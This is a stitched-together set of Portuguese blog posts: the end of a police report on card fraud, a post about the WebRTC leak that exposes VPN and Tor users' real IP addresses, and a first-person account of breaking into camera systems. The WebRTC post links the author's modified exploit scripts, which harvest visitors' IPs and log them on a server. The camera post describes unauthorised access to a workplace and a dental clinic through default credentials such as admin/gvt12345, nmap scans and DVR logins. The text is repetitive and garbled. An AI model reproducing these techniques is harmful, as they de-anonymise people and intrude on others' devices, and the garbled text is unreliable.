A polícia avalia que Leandro é apenas um braço de uma grande quadrilha. Para a delegada Mayana Rezende, o modo de atuação do bando dificulta a localização e prisão dos suspeitos.

“A dificuldade de fazer a prisão e assegurar a punição destas pessoas é muito grande. Geralmente quem é o detentor das senhas hackeadas vem de um estado, quem faz a compra está em outro estado e a vítima também. Em um caso em questão as vítimas de São Paulo. A pessoa fazia as compras em Goiás e o pagamento do Boleto no Pará”, explica a adjunta de DEIC.

Prevenção
A delegada Mayana Rezende orienta que ao comprar em sites pela internet, verificar se são confiáveis ou não.  “Não é uma garantia, mas uma forma de diminuir as chances de golpe” ressalta.

A adjunta da DEIC ainda destaca que para evitar que senhas sejam hackeadas, é preciso verificar se não está entrando numa página falsa de um banco, observar terminais eletrônicos para ver se não há peça solta. Verificar se num estabelecimento comercial está pedindo o cartão mais de uma vez, sem ter algo registrado no visor.

Punição
Na casa de Leandro a polícia ainda encontrou R$ 6 mil em espécie e uma CNH falsa. Ele foi indiciado pelo crime de furto qualificado e falsificação de documento público. A pena poderá chegar a mais de 8 anos de prisão.

O que é um (Cracker)

FONTE: Diário de Goías

segunda-feira, 2 de fevereiro de 2015

WebRTC - JavaScript bypass TOR/VPN - windows

Usuários de VPN estão enfrentando uma falha de segurança enorme, em que  sites podem ter acesso facilmente a seus endereços de IP através WebRTC. A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.  WebRTC é uma API em desenvolvimento elaborada pela World Wide Web Consortium (W3C) para permitir aos navegadores executar aplicações de chamada telefônica, video chat e compartilhamento P2P sem a necessidade de plugins.   Revelações feitas pelo boxedThe Snowden deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.  Apenas alguns dias atrás, nós aprendemos que o Governo canadense rastreados visitantes de dezenas de sites de compartilhamento de arquivo populares.  Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionados.  Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.  Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.  A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.  A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas para verificar se eles são afetados pela falha de segurança.

Usuários de VPN estão enfrentando uma falha de segurança enorme, em que  sites podem ter acesso facilmente a seus endereços de IP através WebRTC.
A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.

WebRTC é uma API em desenvolvimento elaborada pela World Wide Web Consortium (W3C) para permitir aos navegadores executar aplicações de chamada telefônica, video chat e compartilhamento P2P sem a necessidade de plugins.


Revelações feitas pelo boxedThe Snowden deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.

Apenas alguns dias atrás, nós aprendemos que o Governo canadense rastreados visitantes de dezenas de sites de compartilhamento de arquivo populares.

Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionados.

Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.

Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.

A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.

A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas para verificar se eles são afetados pela falha de segurança.

DEMO:


Usuários de VPN estão enfrentando uma falha de segurança enorme, em que  sites podem ter acesso facilmente a seus endereços de IP através WebRTC.  A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.  Revelações feitas pelo boxedThe Snowden deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.  Apenas alguns dias atrás, nós aprendemos que o Governo canadense rastreados visitantes de dezenas de sites de compartilhamento de arquivo populares.  Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionados.  Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.  Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.  A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.  A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas para verificar se eles são afetados pela falha de segurança.

TESTE-DEMO: https://diafygi.github.io/webrtc-ips/

A demo afirma que plugins do navegador não podem bloquear a vulnerabilidade, mas felizmente isso não é inteiramente verdade. Existem várias soluções fáceis disponíveis para corrigir a falha de segurança.

Usuários do Chrome podem instalar a extensão bloco WebRTC ou ScriptSafe, que tanto supostamente pode bloquear a vulnerabilidade.
https://chrome.google.com/webstore/detail/webrtc-block/nphkkbaidamjmhfanlpblblcadhfbkdm

Usuários do Firefox deve ser capaz de bloquear o pedido com o addon NoScript. Alternativamente, eles podem digitar "about: config" na barra de endereços e definir a configuração "media.peerconnection.enabled" para false.

Exemplo-firefox:

Usuários do Firefox deve ser capaz de bloquear o pedido com o addon NoScript. Alternativamente, eles podem digitar "about: config" na barra de endereços e definir a configuração "media.peerconnection.enabled" para false.  Exemplo-firefox:



Outras maneiras de fugir da falha.

"Talvez a melhor maneira de ser protegido de WebRTC e vulnerabilidades semelhantes é executar o túnel VPN diretamente no roteador. Isso permite que o usuário seja conectado a uma VPN diretamente via Wi-Fi, não deixando nenhuma possibilidade de um script desonestos ignorando um túnel VPN software e encontrar a própria IP real ", diz  Ben Van der Pelt tells - TorGuard’s.

"Durante testes usuários do Windows que foram conectados por meio de um roteador VPN não eram vulneráveis a vazamentos WebRTC IP mesmo sem quaisquer correções do navegador".

Enquanto as correções acima são relatados para o trabalho, o vazamento é um lembrete de que o anonimato nunca deve ser tomada como garantida.

Como é frequentemente o caso com este tipo de vulnerabilidades, os usuários de VPN e proxy devem verificar regularmente se a sua conexão é segura. Isso também inclui o teste contra vazamentos de DNS e vulnerabilidades de proxy.

Update: O FreeBSD também parece estar afetado pela vulnerabilidade.

Não só Google Chrome,Mozilla Firefox que usam suporte API WebRTC, mas também Opera e Maxthon Cloud Browser podem ter sidos afetados.

Com modificações fizemos nosso scripts de exploração que alem de capturar o ip já faz o trapalho de salvar em um outpufile.


ARQUIVO-1 EXPLORAÇÃO:
http://pastebin.com/2u55h7Dj

ARQUIVO-2 SALVAR IPS:
Nome arquivo inurlbrasil.php
http://pastebin.com/Wbw9GhPc

Ao acessar o arquivo exploração-1, o mesmo passa via request get os ips captados do cliente para o arquivo-2(inurlbrasil.php) , assim já armazenando o mesmo no arquivo local server detentor do script.

FILE OUTPUT:
Ao acessar o arquivo exploração-1, o mesmo passa via request get os ips captados do cliente para o arquivo-2(inurlbrasil.php) , assim já armazenando o mesmo no arquivo local server detentor do script.


Fonte referencia:
http://pt.wikipedia.org/wiki/WebRTC
https://www.reddit.com/r/VPN/comments/2tva1o/websites_can_now_use_webrtc_to_determine_your
https://torguard.net/blog/browser-security-vulnerability-may-allow-real-ip-leak/
http://torrentfreak.com/huge-security-flaw-leaks-vpn-users-real-ip-addresses-150130/
https://twitter.com/jeremiahg/status/561892669279191040

quarta-feira, 28 de janeiro de 2015

O Perigo de senhas padrões

Bom dia pessoal!

 Ultimamente eu estava pensando oque você consegue fazer tendo acesso a uma rede sem fio(wi-fi) de uma empresa? hoje em dia você estando dentro de uma rede wireless sem proteção, você pode fazer praticamente case tudo! desde rodar um sniffer a realizar ataques Man-in-The-Middle dentre outros diversos tipos de ataques. Mas além disso você pode também pode obter acesso a um serviço de controle de câmeras (DVR) por exemplo. Mas oque isso tem a ver com o tema "Senhas padrões"? Vocês iram entender isso na frente.

 Esses dias eu conseguir acesso a dois serviços de controle de câmeras, um da empresa aonde eu trabalho e o outro de uma clinica dentária do lado, apenas tendo acesso a rede wireless das duas empresas.


Empresa 1 (Trabalho):


Depois de ter pego a senha do wifi, acessei normalmente o roteador e como de costume ele pede login e senha, coloquei diversos logins e senhas padrões [admin,admin] [admin,gvt12345] conseguir acesso ao roteador (Já começou a entrar no assunto do titulo!). Comecei a fuçar o roteador não conseguir encontrar nada de importante, então decidir realizar um Scanner com nmap e acabei descobrindo uma porta aberta 8090 no ip 192.168.1.150. Então acessei ip:porta e me retornou uma tela de login de DVR da intelbras! novamente fui colocando diversas senhas toscas (padrões)  e conseguir acesso ao serviço de controle de câmeras. Isto tudo foi feito com o OS Windows (porque não estava com o notebook no momento), Nmap, e senhas padrões.

   [Tela de login DVR intelbras]


[Serviço de controle de câmeras]





[Resultados nmap]





Empresa 2 (Clinica dentária):


Alguns dias depois da façanha da empresa 1, conseguir acesso a rede wireless de uma clinica dentária vizinha da empresa 1. E pensei porque não fuçar novamente? Só que essa vez usei um android (Samsung Galaxy prime rootado) para realizar o fingerprint. Para o processo de fingerprinting utilizei o aplicativo Fing  para android!



Como mostra a imagem acima, ele me retornou diversos ips. Mas apenas 2 me chamou a atenção por causa dos hostnames (ipcamera_) 192.168.1.22 e 192.168.1.33. Dae então fiz um scan nos dois ip's para descobrir se tinha algum serviço rodando nos ip's! Ele me retornou que tinha um serviço sendo executado na porta 90 do ip 192.168.1.22 e a porta 92 no ip 192.168.1.33!

            



 Logo depois decidir acessar o endereço 192.168.1.22:90, e me apareceu uma tela de autenticação coloquei novamente login e senhas padrões e para minha surpresa ele entrou:



  Depois acessei o endereço 192.168.1.33:92, também me apareceu uma tela de autentificação coloquei novamente o mesmo login e senha do primeiro ip e novamente entrou normalmente!
 
Conclusão:

 Agora me fale oque eu posso fazer tendo acesso a um serviço de controle de câmeras? deixe nos comentários!

 Nunca use senhas padrões em equipamentos eletrônicos! seja eles roteadores, dvr's, aplicativos etc...
um exemplo de ataque realizado com senhas padrões foi o da equipe Lizard Squad que (utilizava Scanners (ferramentas utilizadas para buscar algo) em máquinas potentes com objetivo de encontrar Roteadores domésticos vulneráveis, com a porta 23 (Telnet) aberta. Após a longa varredura efetuada pelo grupo, os IP's encontrados eram filtrados e provavelmente utilizados por outras ferramentas para o ataque de Brute-Force (força bruta) em massa. Esse ataque é conhecido por realizar inúmeras combinações de senhas até se encontrar a correta, e foi isso que o grupo fez... Usou das principais senhas padrões (e óbvias) para efetuar autenticação nos dispositivos, e se não bastasse, ainda os infectava com uma espécie de "Malware" que também efetuava todo o processo para encontrar cada vez mais Zumbis com objetivo de aumentar a força de seus ataques) (Trecho tirado do site infohax)